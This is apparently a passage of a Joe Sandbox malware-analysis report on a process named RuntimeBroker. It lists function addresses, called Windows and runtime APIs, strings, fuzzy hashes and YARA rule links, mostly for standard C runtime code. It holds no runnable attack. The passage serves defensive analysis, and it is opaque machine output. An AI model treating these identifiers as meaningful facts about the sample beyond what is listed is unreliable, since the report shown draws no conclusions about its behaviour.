Opcode Fuzzy Hash: 795f95526d0a951be163d7ee57e77295e71c5006ab84a191c0455a0dace466c7
Instruction Fuzzy Hash: F2212B61A0864681F662BB18EC553FAA2A0FB88780FC44435EA4D53BA6DE3CE545CB60

Function 00007FF72B06A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A5E7
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A61D
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A64A
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A65B
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A66C
SetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A687

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction ID: 5154325346bcd13582cde51b916ee0997c9659df550ba03f4b500074696e9fc0
Opcode Fuzzy Hash: 5dcac91248c0014d458aec840eea87d8b317a92cf5de5997ea3edf93bd94a031
Instruction Fuzzy Hash: 77113B20F0824246FA76772E5E95139E142DF5C7B0F845738E93E066F6DE2CE4814F21

Function 00007FFE0C0B38A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

EncodePointer.KERNEL32 ref: 00007FFE0C0B3918
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE0C0B3963
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B3B91

Strings

MOC, xrefs: 00007FFE0C0B392C
RCC, xrefs: 00007FFE0C0B3934

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction ID: 8520f48301e4b5d51ee2bfa7d64736e7c9ea5b307fa5fb4d4542c2f9635f92c3
Opcode Fuzzy Hash: 63425386b35f735f5eb303e83bfbe55818570f32e5447e3767ff35a3eaf3afb3
Instruction Fuzzy Hash: 3D917F73A087858AE710CF69E8902AD7BA1FB44788F24413AEF8D17765DF38D595CB04

Function 00007FFE0C0BBB70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BBC50

Part of subcall function 00007FFE0C0B8C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B913D
Part of subcall function 00007FFE0C0B8C24: DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0B9175

Strings

volatile, xrefs: 00007FFE0C0BBBE2, 00007FFE0C0BBD30
std::nullptr_t , xrefs: 00007FFE0C0BBDC5
std::nullptr_t, xrefs: 00007FFE0C0BBDF1
volatile , xrefs: 00007FFE0C0BBBD3, 00007FFE0C0BBD21

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: Name::operator+
String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
API String ID: 2943138195-757766384
Opcode ID: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction ID: 70e35c5adab4cd1a41446c963ebb9748e689650ba0691d4e14064a421457ef3c
Opcode Fuzzy Hash: 8ec89114dc1e92fb087ff84a90b975bd849231731579a14e6ae3ff20f009c8f1
Instruction Fuzzy Hash: 15717D72A88A4296EB24CF2CD9A11BC77A6BF05780F444535EB5D03AB8DF3DE650C348

Function 00007FFE0C0B3690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

EncodePointer.KERNEL32 ref: 00007FFE0C0B36DC
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE0C0B372B
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B389F

Strings

RCC, xrefs: 00007FFE0C0B36F9
MOC, xrefs: 00007FFE0C0B36F0

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction ID: 8f5be70b64b7ac49139c8b005d5f31803d26d28d6e25b41483b0dca130c1c6b3
Opcode Fuzzy Hash: bda6881e4fb6ddd96fb50e60b72b5d1eaa618bcc944dda4a5bc0b193bb5b3b27
Instruction Fuzzy Hash: B8617A77A48B858AE724CF69D4903AD77A2FB44B88F244225EF4D13B68DF38E155C708

Function 00007FF72B052300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B052338
DialogBoxIndirectParamW.USER32 ref: 00007FF72B0523FE
DeleteObject.GDI32 ref: 00007FF72B052431
DestroyIcon.USER32 ref: 00007FF72B052443

Strings

Unhandled exception in script, xrefs: 00007FF72B052368

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction ID: b523bfab92ddce5909999e6465ec525f404d981f6fbb7e028b73b5c6873eeaff
Opcode Fuzzy Hash: aa8fae7967b6237ed58108c0441fa719abaab4bc203e45b59d8227776e6be316
Instruction Fuzzy Hash: 28316572609A8285EB35EF65EC552F9A360FF89794F840135EA4D4BB69DF3CD104CB10

Function 00007FF72B052760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B05283B
MessageBoxA.USER32 ref: 00007FF72B05284F

Strings

Error/warning (ANSI fallback), xrefs: 00007FF72B052843
Error, xrefs: 00007FF72B05282C
%s%s: %s, xrefs: 00007FF72B0527EC

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction ID: af1387d9db9d7d3bf83509ff0e6c4c7990992e76bb330028233f50d2ce082711
Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
Instruction Fuzzy Hash: 1521627261868581F631AB14F8917EAE364FF84788F805036E68C03AA9DF7CD645CF50

Function 00007FF72B068DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF72B068DC5
GetProcAddress.KERNEL32 ref: 00007FF72B068DDB
FreeLibrary.KERNEL32 ref: 00007FF72B068E02

Strings

mscoree.dll, xrefs: 00007FF72B068DBC
CorExitProcess, xrefs: 00007FF72B068DD4

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 8e3b3e306574e7f61bf58f8bf8c1e9b279429b4e0d4639f729e3fe6385c65779
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: B0F04F21B1970282EA21AB28AC58379D360EF49761FD4063AC66E462F4CF2CE549DB24

Function 00007FFE0C0B9FA4 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA01D
DName::operator+.LIBVCRUNTIME ref: 00007FFE0C0BA03F
DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA052
DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA089
DName::DName.LIBVCRUNTIME ref: 00007FFE0C0BA094

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: NameName::$Name::operator+
String ID:
API String ID: 826178784-0
Opcode ID: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction ID: e00e91e8b42b9cbbff85c171102a08c2e525794817f1ff8698ecb87524b6d61f
Opcode Fuzzy Hash: 7682a6ebcb32bf14f43659220100a1b4a5a4a6e3db385e7ce84af32120df353b
Instruction Fuzzy Hash: F8417922BA8B5695EB10CB29D8A01BC33B6BF55B80F544032EB5E137A5DF3DE855D308

Function 00007FF72B078678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF72B0786A0
_set_statfp.LIBCMT ref: 00007FF72B0786BB
_set_statfp.LIBCMT ref: 00007FF72B0786D7
_set_statfp.LIBCMT ref: 00007FF72B078713

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: cdbec39fe88b8b913bc251ff7848899eab10ab288a91432b798b2634b240b1d5
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 8A119D22E18B0615F676332EEC55375C140EF54374FA58634EA6F066FADE6CB880A938

Function 00007FF72B06A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6BF
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6DE
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A706
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A717
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A728

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction ID: 1364caece26dab5515411e034ba650f93c67f1b4400aaee923452db8bc1a894e
Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
Instruction Fuzzy Hash: AE112E60B0824241FA7A732E5D45579A191DF5C3A0E848338E83D066F6DE2CF9414E21

Function 00007FF72B06A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF72B06A545
FlsSetValue.KERNEL32 ref: 00007FF72B06A564
FlsSetValue.KERNEL32 ref: 00007FF72B06A58C
FlsSetValue.KERNEL32 ref: 00007FF72B06A59D
FlsSetValue.KERNEL32 ref: 00007FF72B06A5AE

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction ID: e1e106ad7c24c868b650aa32ceaa768513105a404262aad3cbfed5e7d7309070
Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
Instruction Fuzzy Hash: C811AF60F0820742FABBB32E5C55179A282DF4D360E98463CD93E0A6F2ED2CB4814E25

Function 00007FF72B0652B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0652EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0654CC

Strings

verbose, xrefs: 00007FF72B0652C0

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: b2c19d59ef05b815ccca853d3ac178b81d870d9a207edadf02daf4337dd2a9e1
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: B191B232B08A4A41E772AF29D85137DB691FB48B58FC8413ADB5D463E6DF3CE4458B20

Function 00007FF72B06EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06F1B7

Part of subcall function 00007FF72B066D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B066D69

Strings

UTF-8, xrefs: 00007FF72B06F136
UTF-16LEUNICODE, xrefs: 00007FF72B06F155
ccs, xrefs: 00007FF72B06F0F2

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 4f010d35ff208d2c723585413aa800c4e70c2e295ecb55bdf8dce9ed40208194
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: EB81A472F0820385F7766F2DC910279A6A0EB19B44FD5803DDA09972F6DF2DE9419F21

Function 00007FFE0C0B4044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0C0B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE0C0B239E), ref: 00007FFE0C0B671E

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE0C0B41C3

Strings

, xrefs: 00007FFE0C0B4114
csm, xrefs: 00007FFE0C0B41FD
csm, xrefs: 00007FFE0C0B4093

Memory Dump Source

Source File: 00000007.00000002.1780946582.00007FFE0C0B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE0C0B0000, based on PE: true

Associated: 00000007.00000002.1780870002.00007FFE0C0B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781158686.00007FFE0C0C6000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.1781227690.00007FFE0C0C7000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffe0c0b0000_RuntimeBroker.jbxd

Similarity

API ID: abort
String ID: $csm$csm
API String ID: 4206212132-1512788406
Opcode ID: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction ID: e94e362baacd58459c3bed5f1e436b4e642d76d0c65f6510fa9c59a3099200ce
Opcode Fuzzy Hash: a1e41bd14f4dc8a012b9b6851bae8dba3a2639313cd67671a1d4b299b7556132
Instruction Fuzzy Hash: 2F71B03294868186DB20CFA9D4A07797BA2FF04F88F048135DF8C07AAACB3CD651D749

Function 00007FF72B05C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B05C993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF72B05CA2A
RtlUnwindEx.KERNEL32 ref: 00007FF72B05CA84

Strings

csm, xrefs: 00007FF72B05CA11

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 32d30eb9b581d902e34a83233bec81a9ddfc7516a7bd881ef265421ed143e5cd
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: 7F51B632B196428AEB35EF1DE884A79B791FB44B88F904131DA8D43B55EF7DE841CB10

Function 00007FF72B05E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF72B05E257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF72B05E2A3

Strings

MOC, xrefs: 00007FF72B05E26B
RCC, xrefs: 00007FF72B05E273

Memory Dump Source

Source File: 00000007.00000002.1780459760.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000007.00000002.1780354000.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780567126.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780659948.00007FF72B093000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.1780803479.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
Instruction ID: e8aa95862f049df6bdb488c92c46f8a077187875982a9bd6e7b22285e5271803
Opcode Fuzzy Hash: c1bd0f280093dc077c2402edd2c21f20ddcaf15bcc9dc74a739a9fc2baeea3e9
